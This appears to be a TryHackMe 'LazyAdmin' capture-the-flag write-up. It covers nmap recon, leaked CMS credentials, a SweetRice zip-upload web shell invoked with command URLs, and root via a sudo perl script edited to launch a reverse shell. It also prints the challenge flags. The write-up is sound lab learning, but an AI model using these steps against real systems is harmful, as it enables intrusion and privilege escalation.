THM lazyadmin
Reconnaissance:
nmap -sV -sC -v 10.64.175.255
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We first login and look around with ffuf and find /content/as
Its a login page so we need to find a foothold
We find /inc/mysql_backup, theres credentials here:
user: manager
password: Password123
Exploitation:
We use those in /content/as/ to enter the admin dashboard with our crendentials
We go into the upload section and upload php shell but it doesn’t work
However a previously explored CVE mentionned zip files being passed (https://github.com/weekevy/SweetRice-CMS-1.5.1-RCE-Exploit)
So we pass the shell as a zip and select the extract option
We upload our shell at http://10.64.175.255/content/attachment/07c50bb701829fb5aefbd4f47f3cddb2.php add ?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We go back a few directory and get the flag at http://10.64.175.255/content/attachment/07c50bb701829fb5aefbd4f47f3cddb2.php?cmd=cat%20../../../../../home/itguy/user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}
sudo -l returns
Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
We’re gonna need a reverse shell here
We go to pentestmonkey get a php shell wrap the shell with zip send it over and extract
We catch it with our listener and check the /usr/bin/perl
Its a rev shell to another IP, the admin just logged here basically, so we change it to our IP and port
Once the rev shell in /etc/copy.sh points to our address we run perl targetting our /home/itguy/backup.pl (the one we dont need permission to use)
sudo perl /home/itguy/backup.pl
whoami
root
Next we cd /root & cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}
Notes:
Arbitrary file inclusion is very dangerous and here we use the admin dashboard to insert a malicious zip file and extract & launch it.
Tools:
- pentestmonkey great php reverse shell.